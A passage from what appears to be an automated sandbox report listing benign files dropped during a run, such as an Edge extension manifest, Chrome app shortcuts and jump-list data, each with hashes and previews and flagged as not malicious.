                                                                                                                                                                                                                                                                                          Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_544803628\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):10388
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                          MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                          SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                          SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                          SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_544803628\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):962
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                          MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                          SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                          SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                          SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):6222
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.7059829079739166
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:9+PjhWCGbU2K+QzukvhkvklCyw/n2CbprhlzNSogZouibprhl/NSogZoq1:MVWCzoLkvhkvCCtxdrhmHKdrhaH5
                                                                                                                                                                                                                                                                                          MD5:E91090C48E93833B760B62EE545BC661
                                                                                                                                                                                                                                                                                          SHA1:CBC13F370F5868803045DDBBB6DB1C6EEA6028E3
                                                                                                                                                                                                                                                                                          SHA-256:03431A8E554270058B32C43C8B93C8CC6F49F5D208B69DFCAF6E24D5D4B85BC1
                                                                                                                                                                                                                                                                                          SHA-512:67639B540F42F8E8B6B64B0F02E3DBB5D05A13D935FBE013D346874765EABC8B3DCF22E957125B5F0C53A12F6588F9D3834BBE5526069DBA8F0743228C6734B1
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...................................FL..................F.".. ...d........@.[..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.......Y.[..f.K.[......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y=.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......YA...Roaming.@......DWSl.YA.....C......................m..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.Y=.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.Y=.....E.....................7...W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.Y=.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.Y=.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.YD.....q...........

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5T09ZS4ZDGAUXMFPL2J8.temp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):6222
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.7059829079739166
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:9+PjhWCGbU2K+QzukvhkvklCyw/n2CbprhlzNSogZouibprhl/NSogZoq1:MVWCzoLkvhkvCCtxdrhmHKdrhaH5
                                                                                                                                                                                                                                                                                          MD5:E91090C48E93833B760B62EE545BC661
                                                                                                                                                                                                                                                                                          SHA1:CBC13F370F5868803045DDBBB6DB1C6EEA6028E3
                                                                                                                                                                                                                                                                                          SHA-256:03431A8E554270058B32C43C8B93C8CC6F49F5D208B69DFCAF6E24D5D4B85BC1
                                                                                                                                                                                                                                                                                          SHA-512:67639B540F42F8E8B6B64B0F02E3DBB5D05A13D935FBE013D346874765EABC8B3DCF22E957125B5F0C53A12F6588F9D3834BBE5526069DBA8F0743228C6734B1
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...................................FL..................F.".. ...d........@.[..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.......Y.[..f.K.[......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y=.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......YA...Roaming.@......DWSl.YA.....C......................m..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.Y=.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.Y=.....E.....................7...W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.Y=.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.Y=.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.YD.....q...........

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 31 14:58:57 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2677
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.9824032768948627
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:8fdqTWu75HlidAKZdA19ehwiZUklqehTy+3:8wT7xgy
                                                                                                                                                                                                                                                                                          MD5:C28C177BBF2D32FA3F07BB9C3A31F782
                                                                                                                                                                                                                                                                                          SHA1:A26FB8465A4D3D32F57F32DFF1963DF65120729C
                                                                                                                                                                                                                                                                                          SHA-256:B8DE7E084943EAF688EEB1E20DAA19DBF2F6967EA0642195ECCB84DC8FE21DB0
                                                                                                                                                                                                                                                                                          SHA-512:3424B1D86365FECBE983B3F05863083D0019F4FD6A5126FF0F1197200D521DCC3E63736E224A34055EAAA10DC787767EFDA66B8DEBD485F742F81FBA65FE7DD6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,....).3.[..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.YZ.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YZ.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.YZ.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.YZ............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y]............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........\.}e.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 31 14:58:56 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2679
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.998688326630283
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:8jTdqTWu75HlidAKZdA1weh/iZUkAQkqehQy+2:8j0T7D9Q5y
                                                                                                                                                                                                                                                                                          MD5:E38425F73BC0EF52B930C068935C8F67
                                                                                                                                                                                                                                                                                          SHA1:96D20EA9146F2AD35F19D1BEDA2A6CF099A19A4E
                                                                                                                                                                                                                                                                                          SHA-256:C42778BA22A74BB4069CD1DF5EBCD15B51F8525E8A8C3C7C383DE751971E2F5B
                                                                                                                                                                                                                                                                                          SHA-512:25A9E7D59CE56ED7F0EBCDDE1F5AF7F5F64D152EC3779CC3B0E83538C65D59692B56883ED3D6D30A4E591A7CA583CC57408079C5DB659A383DF9B35F14879C86
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,........[..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.YZ.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YZ.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.YZ.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.YZ............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y]............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........\.}e.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2693
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.007362454885996
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:8xndqTWusHlidAKZdA14tseh7sFiZUkmgqeh7suy+BX:8xoTwnsy
                                                                                                                                                                                                                                                                                          MD5:568621D553807338DF3C9394F7012EF0
                                                                                                                                                                                                                                                                                          SHA1:ED13EEC125DEEFF5D85FA4A6806F1561B541051E
                                                                                                                                                                                                                                                                                          SHA-256:6DFDE6F1B7E3520E1359CC35625450DEE541B248DE316ED64DD0C4AD4FE4B145
                                                                                                                                                                                                                                                                                          SHA-512:F46964B51DB3BB387801F33395ED0A954F12B059DDD6C5CB189DA89E96D38F244A3BF12344FD5911B0C19DDD4ED2DB148A66B0433604683CDB1D1467CB49977D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.YZ.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YZ.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.YZ.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.YZ............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........\.}e.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 31 14:58:56 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2681
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.99245935513136
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:8xdqTWu75HlidAKZdA1vehDiZUkwqehUy+R:8+T7g2y
                                                                                                                                                                                                                                                                                          MD5:32AFF63BCCCF6904A0EC8B4E509BD3B7
                                                                                                                                                                                                                                                                                          SHA1:3A51570E74699E6608A9313A57FB4A6B1C7A31DA
                                                                                                                                                                                                                                                                                          SHA-256:437A906485CFA654BDEC438676E9816157CD88DB60CC2D0F3619A851E79B8FCF
                                                                                                                                                                                                                                                                                          SHA-512:262EFC493F488CC45A16E843E0D1224DA93412CEEA2628C79C967AA3BC9A2C0D58EA58064BF054503640B75D1921C920F8CAC484907DD50C4AF2EB50893FC733
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,....ai..[..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.YZ.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YZ.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.YZ.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.YZ............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y]............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........\.}e.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 31 14:58:56 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2681
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.9851945763907604
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:8rydqTWu75HlidAKZdA1hehBiZUk1W1qehqy+C:8rfT7A9Ky
                                                                                                                                                                                                                                                                                          MD5:2235C4E50D6F397B3DFE118D7685C3DA
                                                                                                                                                                                                                                                                                          SHA1:42676E47BDD977EB75DC84D6E67FE6B28E4C5847
                                                                                                                                                                                                                                                                                          SHA-256:31668E7FFAEEF03EE855E4BE1199A218445CC8B75083C6B9C7FC7D3396837B2A
                                                                                                                                                                                                                                                                                          SHA-512:C175D1020BE13CC2D011B60EE7E835C5ED0759CB8D457632DE8CB780D81A931400290EC5AF84AA70B0ED61CD518F658EFB02FFD6F419764244B74822AE76B24E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,.......[..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.YZ.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YZ.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.YZ.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.YZ............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y]............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........\.}e.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 31 14:58:56 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2683
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.9952644274379505
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:8AdqTWu75HlidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbsy+yT+:8RT7OT/TbxWOvTbsy7T
                                                                                                                                                                                                                                                                                          MD5:E60EDE42747312622237F68A52A3B93B
                                                                                                                                                                                                                                                                                          SHA1:50D1269E0A1FCA0D9B81FB6C2E9B552D4A70101D
                                                                                                                                                                                                                                                                                          SHA-256:B9B8584C5E7A904DB198CB9C2FD963928A78CB8223A0C0177C262EBBAD56EBDE
                                                                                                                                                                                                                                                                                          SHA-512:6CCDF27C2E7292CEA8BEF244C314D4A2B1E0B5D14AFD718A65A5C4BBAA303ABFA702690D6086DCB5B0C11FAB0336A485778DE4B2D3EEEDBBADF7895E6C5253A3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,........[..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.YZ.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YZ.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.YZ.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.YZ............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y]............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........\.}e.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):55
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                                                                                                          Chrome Cache Entry: 489

                                                                                                                                                                                                                                                                                          Download File
